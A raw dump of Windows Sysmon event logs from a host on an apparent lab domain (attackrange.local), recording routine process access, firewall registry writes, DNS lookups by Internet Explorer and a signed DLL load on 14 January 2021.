Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa08(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1ba9bf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1ba966(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a8abf(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b324e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b319b(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\SYSTEM32\urlmon.dll+10c870(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5b40a(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bbb0(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bccc(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+40bd89(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+4d11d0(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+4d4239(wow64) 10341000x800000000000000013263Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:34.154{08A6967A-4750-6000-0205-000000009A01}47883780C:\Windows\system32\csrss.exe{08A6967A-47B6-6000-4305-000000009A01}6412C:\Windows\system32\fontdrvhost.exe0x13ffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013262Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:34.154{08A6967A-4750-6000-0305-000000009A01}50724172C:\Windows\system32\winlogon.exe{08A6967A-47B6-6000-4305-000000009A01}6412C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\winlogon.exe+60dea|C:\Windows\system32\winlogon.exe+3508a|C:\Windows\system32\winlogon.exe+1bbfd|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000013261Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:31:34.123{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-95739096-486727260-2033287795-3853587803-1685597119-444378811-2746676523S-1-5-18v2.26|AppPkgId=S-1-15-2-95739096-486727260-2033287795-3853587803-1685597119-444378811-2746676523|LUOwn=S-1-5-18|M=microsoft.windows.fontdrvhost|Name=Usermode Font Driver Host|Desc=Usermode Font Driver Host| 13241300x800000000000000013260Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:31:34.123{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x00000594) 13241300x800000000000000013259Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:31:34.123{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{EECD0D96-1180-4CD0-A06D-44DEE2F4FB0C}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=Usermode Font Driver Host|Desc=Usermode Font Driver Host|LUOwn=S-1-5-18|AppPkgId=S-1-15-2-95739096-486727260-2033287795-3853587803-1685597119-444378811-2746676523|EmbedCtxt=Usermode Font Driver Host| 13241300x800000000000000013258Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:31:34.123{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x00000593) 13241300x800000000000000013257Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:31:34.123{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{0EEFFAF3-EDBF-4318-B3CA-0B48469FE766}v2.26|Action=Block|Active=TRUE|Dir=In|Name=Usermode Font Driver Host|Desc=Usermode Font Driver Host|LUOwn=S-1-5-18|AppPkgId=S-1-15-2-95739096-486727260-2033287795-3853587803-1685597119-444378811-2746676523|EmbedCtxt=Usermode Font Driver Host| 10341000x800000000000000013256Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:34.108{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013255Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:34.045{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013254Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:34.029{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013253Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:34.029{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013252Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:34.014{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000013270Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:33.894{08A6967A-4781-6000-3A05-000000009A01}6928www.google.de0::ffff:172.217.16.163;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013269Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:33.833{08A6967A-4781-6000-3A05-000000009A01}6928www.google.com0::ffff:172.217.18.164;C:\Program Files (x86)\Internet Explorer\iexplore.exe 10341000x800000000000000013277Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:37.639{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013276Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:37.608{08A6967A-4754-6000-1705-000000009A01}34085404C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+2fd1a|C:\Windows\Explorer.EXE+2ff29|C:\Windows\Explorer.EXE+2fc59|C:\Windows\Explorer.EXE+3ab97|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013275Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:37.608{08A6967A-4754-6000-1705-000000009A01}34085404C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+3007c|C:\Windows\Explorer.EXE+30028|C:\Windows\Explorer.EXE+2fccc|C:\Windows\Explorer.EXE+2ff29|C:\Windows\Explorer.EXE+2fc59|C:\Windows\Explorer.EXE+3ab97|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013274Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:37.608{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa08(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1ba9bf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1ba966(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a8abf(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b324e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b319b(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\SYSTEM32\urlmon.dll+10c870(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5b40a(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bbb0(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bccc(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+40bd89(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+4d11d0(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+50ec20(wow64) 10341000x800000000000000013273Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:37.592{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013272Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:37.576{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013271Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:37.576{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000013278Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:31:40.811{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ea79-0x9786529f) 10341000x800000000000000013281Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:47.248{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013280Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:47.248{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013279Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:47.248{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013285Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:49.264{08A6967A-4780-6000-3905-000000009A01}68685940C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+124a5|C:\Windows\System32\windows.storage.dll+e7227|C:\Windows\System32\windows.storage.dll+e6b53|C:\Windows\System32\windows.storage.dll+e69d9|C:\Windows\System32\shcore.dll+2ec07|C:\Windows\SYSTEM32\IEFRAME.dll+12df6a|C:\Windows\SYSTEM32\IEFRAME.dll+12e712|C:\Windows\SYSTEM32\IEFRAME.dll+12e150|C:\Windows\SYSTEM32\IEFRAME.dll+3005e|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013284Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:49.264{08A6967A-4780-6000-3905-000000009A01}68685940C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+124a5|C:\Windows\System32\windows.storage.dll+e7192|C:\Windows\System32\windows.storage.dll+e6b53|C:\Windows\System32\windows.storage.dll+e69d9|C:\Windows\System32\shcore.dll+2ec07|C:\Windows\SYSTEM32\IEFRAME.dll+12df6a|C:\Windows\SYSTEM32\IEFRAME.dll+12e712|C:\Windows\SYSTEM32\IEFRAME.dll+12e150|C:\Windows\SYSTEM32\IEFRAME.dll+3005e|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013283Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:49.264{08A6967A-4780-6000-3905-000000009A01}68685940C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+6422|C:\Windows\System32\shcore.dll+611d|C:\Windows\System32\shcore.dll+5ddd|C:\Windows\System32\shcore.dll+5d6f|C:\Windows\System32\shcore.dll+5c74|C:\Windows\System32\windows.storage.dll+e7177|C:\Windows\System32\windows.storage.dll+e6b53|C:\Windows\System32\windows.storage.dll+e69d9|C:\Windows\System32\shcore.dll+2ec07|C:\Windows\SYSTEM32\IEFRAME.dll+12df6a|C:\Windows\SYSTEM32\IEFRAME.dll+12e712|C:\Windows\SYSTEM32\IEFRAME.dll+12e150|C:\Windows\SYSTEM32\IEFRAME.dll+3005e|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013282Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:49.264{08A6967A-4780-6000-3905-000000009A01}68685940C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+60f4|C:\Windows\System32\shcore.dll+5ddd|C:\Windows\System32\shcore.dll+5d6f|C:\Windows\System32\shcore.dll+5c74|C:\Windows\System32\windows.storage.dll+e7177|C:\Windows\System32\windows.storage.dll+e6b53|C:\Windows\System32\windows.storage.dll+e69d9|C:\Windows\System32\shcore.dll+2ec07|C:\Windows\SYSTEM32\IEFRAME.dll+12df6a|C:\Windows\SYSTEM32\IEFRAME.dll+12e712|C:\Windows\SYSTEM32\IEFRAME.dll+12e150|C:\Windows\SYSTEM32\IEFRAME.dll+3005e|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000013286Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:55.748{08A6967A-4753-6000-0F05-000000009A01}1084C:\Windows\System32\svchost.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x800000000000000013294Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:15.374{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-47DF-6000-4405-000000009A01}6508C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 